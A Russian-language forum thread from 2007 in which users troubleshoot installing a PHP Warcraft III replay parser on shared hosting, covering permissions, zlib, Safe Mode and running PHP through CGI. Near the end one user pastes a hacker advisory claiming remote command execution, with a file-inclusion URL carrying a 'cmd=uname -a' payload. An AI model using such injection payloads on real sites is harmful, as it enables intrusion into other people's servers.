MAL4X Научно-технический форум разработчиков симуляторов и автоматики


Симуляторы перегрузок. DIY электроника. ЭВМ. Компьютерные сети.
Up

Php скрипт

Техническая поддержка нахаляву, но не оперативная.

Модераторы: FELiS, Death_Morozz, null

Сообщение PANDOR » 23 авг 2007, 14:31

В мануале сказано что скрит держит 4ый пхп
Поставил на свой локальный сервер. Этот скрипт. Эффект - тот же - не заливаются файлы
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение Death_Morozz » 23 авг 2007, 15:22

А каков путь до файла с базой записей? Может нет нужного каталога? Или он должен писать файл в ту же папку где находится сам?

вот кусок из фака скрипта:

* It doesn't work at all! What is wrong?
First of all check if you have created database and replays dir and if their
names are correct (the same as in example.php). If the script still doesn't work
make sure that PHP has zlib support.
Хочешь сделать хорошо - сделай это сам.
Изображение
Аватара пользователя
Death_Morozz
Фраерок
 
Сообщения: 2670
Зарегистрирован: 11 янв 2007, 23:35
Откуда: Ростов-на-Дону
Благодарил (а): 769 раз.
Поблагодарили: 292 раз.
Баллы репутации: 200
ТехнарьТехнарьТехнарь

Сообщение FELiS » 23 авг 2007, 16:04

PANDOR писал(а):я не знаю какие требуются права для стабильной работы (без вломов и чтоб не глючило)
поэтому я разрешил все. Для всех груп параметры wrx (Запись чтение исполнение)

бери ридми в руке и смотри права.
на папки куда кидаются реплеи там ставь 777 (rwx.rwx.rwx)
на *.php файлы 655 (rwx.rx.rx)
пути проверь, и посмотри поддерживает ли пхп gzip, непомню, там какойто модуль надо помойму подключать или нет. проверь в php.ini на локале параметры касающиеся аплоада файлов корректность пути временной папки и ограничение размера

(Добавление)
gzip делается в пхп zlib`ом

(Добавление)
З.Ы. еще есть такая заморочка, что если ставить 777 на все подряд то скрипты могут неработать вообще либо частично
СКС СКУД ОПС

http://electret2001.ru
http://nytvagrad.ru
http://el-komponent.ru - Качественные радиодетали в Ростове-на-Дону
http://unlockclub.ru/forum/ - здесь я получил код разблокировки бесплатно
Аватара пользователя
FELiS
Добрый Фелис
 
Сообщения: 513
Зарегистрирован: 11 янв 2007, 23:21
Благодарил (а): 24 раз.
Поблагодарили: 118 раз.
Баллы репутации: 146
ТехнарьТехнарь

Сообщение PANDOR » 24 авг 2007, 02:07

Та вроде эти папки сразу создал, тк при запуске ругался.
"cant read replay folder"
Создал папку
потом стало ругаться
Cant read database folder

Посмотрел в скрипте, где и как пишутся эти папки
создал.

Стали репки отображаться, но не добавляются

Вот скриншот. тут прова на папки, и файлы.

Изображение

Смущает эта запись
Warcraft III Replay Parser for PHP. Copyright © 2003-2005 Juliusz 'Julas' Gonera. All rights reserved. Generated in 0.02068400 seconds.


Хотя загружается по 3 минуты. А сам жино вроде бодрый

Зы настройки php на жино незнаю
Но в случае чего мона как то через cgi скрипты запускать php со своими настройками

Запустить бы только в локале все нормально

ЗЗЫ Антон где ты взял мануал по этому скрипту ? я все обзалял, либо форумы закрыты либо ошибки 404
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение PANDOR » 24 авг 2007, 12:40

я понял в чем дело ....

Safe Mode — режим работы PHP, обеспечивающий безопасность пользовательских данных и предотвращающий попытки доступа к ним со стороны других пользователей хостинга. Вместе с тем, Safe Mode накладывает на пользовательские PHP-скрипты некоторые ограничения.

Со списком ограничений Safe Mode Вы можете ознакомиться в таблице 42-2 официальной документации PHP.


Отключить Safe Mode нельзя, даже для одного-единственного аккаунта на хостинге. Но есть обходной путь — запуск PHP через CGI.


Запуск PHP в режиме CGI позволяет работать без safe_mode'а, указывать свой php.ini, работать из PHP с любыми файлами на аккаунте и иметь полный доступ к файлам, созданным из PHP.

Порядок действий:

1.

Подключить услугу «Поддержка CGI» (услугу «Поддержка PHP» можно отключить).
2.

Создать файл php.cgi:

#!/bin/bash
php -n

или

#!/bin/bash
php -с /путь/к/файлу/php.ini

3.

Закачать файл на сервер в ASCII-режиме в папку домена, на котором предполагается запускать PHP в режиме CGI. Например, для домена test.ru это будет папка /domains/test.ru. Если домен размещен в папке /docs, файл нужно закачивать в папку /docs. Если закачать файл не в ASCII-режиме, скрипт работать не будет, будет выдаваться ошибка 500 (Internal Server Error).
4.

Установить на файл php.cgi права 0755 (rwxr-xr-x).
5.

Проверить права на папку домена. Должны быть установлены права 0755 (drwxr-xr-x). Внутри папки с правами 0777 (drwxrwxrwx) скрипт работать не будет, будет выдаваться ошибка 500 (Internal Server Error).
6.

Создать файл .htaccess в директории домена, на котором PHP будет работать в режиме CGI, и поместить в него следующие директивы:

Action php-cgi /php.cgi
AddHandler php-cgi .php

Теперь файлы с расширением .php будут обрабатываться PHP интерпретатором в CGI-режиме.

Недостатки такого способа: низкая скорость работы, недоступность некоторых функций модуля и потенциальная небезопасность: если ваш скрипт взломают, это может иметь более серьезные последствия, чем если бы PHP работал как модуль Apache. Поэтому мы не рекомендуем запускать PHP через CGI без особой на то необходимости.



Для того, чтобы оценить возможности и познакомиться с «Джино», достаточно просто зарегистрироваться в системе. Регистрация абсолютно бесплатна, нужно только выбрать себе удобные логин и пароль. После регистрации вы сможете войти в контрольную панель и ознакомиться с ее функциями.

В демо-режиме вы сможете выложить файлы на сервер. Посмотреть на получившийся сайт можно, обратившись к нему в браузере: http://ваш-логин.jino.ru. Вы также сможете создать себе почтовые ящики и протестировать почту. Адрес ящиков будет следующим: имя@ваш-логин.jino.ru. Можете настроить себе почтовый клиент и получить письма, однако отсылать письма в демо-режиме нельзя (это связано в первую очередь с защитой от возможных несанкционированных рассылок — спама).

В демо-режиме будут недоступны некоторые функции контрольной панели, т. е. вы не сможете, к примеру, подключить себе MySQL, PHP или скрипты. Отключить услуги тоже будет невозможно.

Сразу после пополнения баланса, демо-режим будет переключен в активный режим и вы сможете подключить все необходимые услуги. То есть, вам не нужно регистрироваться второй раз, чтобы начать пользоваться услугами «Джино». Вы сможете зарегистрировать или перенести свой домен, однако в любом случае возможность использования альтернативного адреса домена (http://ваш-логин.jino.ru) останется.

Внимание: если после регистрации и получения демо-режима баланс не будет пополнен в течение 10 суток, логин будет удален, а все файлы, которые были записаны вами в демо-режиме, уничтожены.

Также после регистрации вам будут доступны бесплатные предустановленные приложения «Джино», такие как Joomla!, PHP-Fusion, Drupal, phpBB и другие.
Свернуть блок

Также после регистрации вам будут доступны бесплатные предустановленные приложения «Джино», такие как Joomla!, PHP-Fusion, Drupal, phpBB и другие.


Вот же ш сцуки. ДЕНЕГ ХОТЯТ.
НАДА на другой переходить и там попробывать

(Добавление)
Где зарегистрироваться на FATALE ?
я там кнопочки регистрация не нашел .....


(Добавление)
Да с импортом кода на сайт вроде справился
Пусть и коряво но эфект есть )
смотреть тут http://hiot.ucoz.ru/index/0-23
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение PANDOR » 24 авг 2007, 16:00

4ort

Fatal не регит новых пользователей

http://forum.fatal.ru/viewtopic.php?t=3583

Кто подскажет подобный хостинг ?
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение Death_Morozz » 24 авг 2007, 21:32

чисто пхп, чисто по стандарту хттп в.1 это у нас Изображение никаких мускулей (пока) и прав никаких тоже, очень жестокий хостинг, я сам боюсь.

По существу вопроса: FeliS шарит в хостингах. у него даже аккаунт есть там Изображение
Хочешь сделать хорошо - сделай это сам.
Изображение
Аватара пользователя
Death_Morozz
Фраерок
 
Сообщения: 2670
Зарегистрирован: 11 янв 2007, 23:35
Откуда: Ростов-на-Дону
Благодарил (а): 769 раз.
Поблагодарили: 292 раз.
Баллы репутации: 200
ТехнарьТехнарьТехнарь

Сообщение FELiS » 24 авг 2007, 21:33

я тебе могу свой подогнать акк (только надо пасс вспомнить) http://felis.pp.ru + можно зарегать домен на него вида hiot.org.ru на http://ripn.net , подобных нет потому что только фатал на халяву баннеры не вешает. а так за 480Х60 баннер вверху экрана можешь юзать http://holm.ru

(Добавление)
блин, адрес надо делегировать, http://felis.pp.ru неработает, доступен только родной фаталовский адрес http://felis.polubomu.ru

(Добавление)
Safe Mode
тема жесткая, под нее надо скрипт переписывать если он корявый.
2 PANDOR раздобадь ридми, там должно быть написано Safe Mode влияет на работу скрипта или нет
СКС СКУД ОПС

http://electret2001.ru
http://nytvagrad.ru
http://el-komponent.ru - Качественные радиодетали в Ростове-на-Дону
http://unlockclub.ru/forum/ - здесь я получил код разблокировки бесплатно
Аватара пользователя
FELiS
Добрый Фелис
 
Сообщения: 513
Зарегистрирован: 11 янв 2007, 23:21
Благодарил (а): 24 раз.
Поблагодарили: 118 раз.
Баллы репутации: 146
ТехнарьТехнарь

Сообщение PANDOR » 24 авг 2007, 21:45

Домен зарегить можно, я уже натыкался на регистратор
тока там паспортные данные вводить, я подумал ну иво нах, как нить потом )))

А насчет хоста, фелис, где мне раздобыть хостичек. с пхп и чтобы там метров 50 было. на юзание.

А то совсем разочаровался я в джино. Через 10 дней акаунт удалят если деньгу не дам
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение FELiS » 24 авг 2007, 21:47

P.S. еще есть одно замечание, на фатале неработает майскюль, проверь требуется ли он скрипту (читая ридми или юзая поиском по скрипту по слову MySQL).
СКС СКУД ОПС

http://electret2001.ru
http://nytvagrad.ru
http://el-komponent.ru - Качественные радиодетали в Ростове-на-Дону
http://unlockclub.ru/forum/ - здесь я получил код разблокировки бесплатно
Аватара пользователя
FELiS
Добрый Фелис
 
Сообщения: 513
Зарегистрирован: 11 янв 2007, 23:21
Благодарил (а): 24 раз.
Поблагодарили: 118 раз.
Баллы репутации: 146
ТехнарьТехнарь

Сообщение PANDOR » 24 авг 2007, 23:10

Тока Zlib и php 4+

(Добавление)
2 PANDOR раздобадь ридми, там должно быть написано Safe Mode влияет на работу скрипта или нет


Ридми по этому скрипту как такое отсутствует

вот все что есть:
* It doesn't work at all! What is wrong?
First of all check if you have created database and replays dir and if their
names are correct (the same as in example.php). If the script still doesn't work
make sure that PHP has zlib support.

* I get some "Notice: (...)" messages. How can I get rid of them?
Set error reporting to the default value in your php.ini
error_reporting = E_ALL & ~E_NOTICE
Or add the following line to example.php:
error_reporting(E_ALL ^ E_NOTICE);

* Can I use the parser on my site without any restrictions?
Yes, as long as you put a link to the parser's homepage on your site.


Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work.

How do I use it?
First of all you need to know the basics of PHP language. Generally, PHP Warcraft III Replay Parser is a class with many arrays and variables. It's divided into five sections (arrays): header (basic information about the replay file), game (basic information about the match), teams (who played/observed the game), chat (if it was present in the game) and, since version 2.0, errors (with errors that occured during parsing the replay file). Each section has its own subarrays and variables describing the replay (try print_r() function to see the whole structure). It's only up to you which of them you use.

A comprehensive example, which can be found here (also the link on the top), is also provided in the package. If you experience any problems you may want to take a look at this forum thread, W3G documentation (by Nagger and Blue; also included in the package) or at PHP Documentation.

Download
I advise you to use the newest version, download an older one only if the newest works wrong for you. You can report bugs by contacting me via e-mail.
Please place a note with a link to this website on your site if you use this script.



http://warcraft.kliegman.com/


(Добавление)
ПО запросу в гугле часто находил эту запись

Warcraft III Replay Parser Script Remote Command Exucetion

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work. *

I. Remote Command Exucetion ..

Yolumuz agitlerin yoludur.!

http://site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

2.XSS Attacking

http://site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

Solution : up version

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

14'ler Ölümsüzdür.
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение Death_Morozz » 24 авг 2007, 23:34

ОВЕРКВОТИНГ!
Хочешь сделать хорошо - сделай это сам.
Изображение
Аватара пользователя
Death_Morozz
Фраерок
 
Сообщения: 2670
Зарегистрирован: 11 янв 2007, 23:35
Откуда: Ростов-на-Дону
Благодарил (а): 769 раз.
Поблагодарили: 292 раз.
Баллы репутации: 200
ТехнарьТехнарьТехнарь

Сообщение PANDOR » 25 авг 2007, 14:58

Вааааа ... АХТУНГ Изображение ахтунг
Аватара пользователя
PANDOR
Новичок
 
Сообщения: 47
Зарегистрирован: 01 фев 2007, 21:35
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Баллы репутации: 5

Сообщение Death_Morozz » 28 авг 2007, 23:23

Дак что там, получилось?
Хочешь сделать хорошо - сделай это сам.
Изображение
Аватара пользователя
Death_Morozz
Фраерок
 
Сообщения: 2670
Зарегистрирован: 11 янв 2007, 23:35
Откуда: Ростов-на-Дону
Благодарил (а): 769 раз.
Поблагодарили: 292 раз.
Баллы репутации: 200
ТехнарьТехнарьТехнарь

Сообщение FELiS » 29 авг 2007, 00:12

Скрипт очень корявый, написан непонятно. вот что я узнал:
PHP:


    // the code for register_globals = Off
    // uncomment it if you can't view details, if everything works for you then leave this commented
    //$id = $_GET['id'];


Если register_globals в php.ini выключена надо раскомментировать эту строку:
//$id = $_GET['id'];

и еще, в php.ini надо отредактировать строчку:
upload_tmp_dir = c:\tmp поставь правильную папку

(Добавление)
З.Ы. сколько я не извращался над ним он так и незаработал как надо на shttps, может надо попробовать на другом? можно установить денвер и посмотреть что тогда получится. к сожалению я такой возможности не имею т.к. на жипиресе
СКС СКУД ОПС

http://electret2001.ru
http://nytvagrad.ru
http://el-komponent.ru - Качественные радиодетали в Ростове-на-Дону
http://unlockclub.ru/forum/ - здесь я получил код разблокировки бесплатно
Аватара пользователя
FELiS
Добрый Фелис
 
Сообщения: 513
Зарегистрирован: 11 янв 2007, 23:21
Благодарил (а): 24 раз.
Поблагодарили: 118 раз.
Баллы репутации: 146
ТехнарьТехнарь

Пред.След.

Вернуться в Техподдержка

Кто сейчас на конференции

Сейчас этот форум просматривают: Mail.Ru [Bot] и гости: 4

cron
x

#{title}

#{text}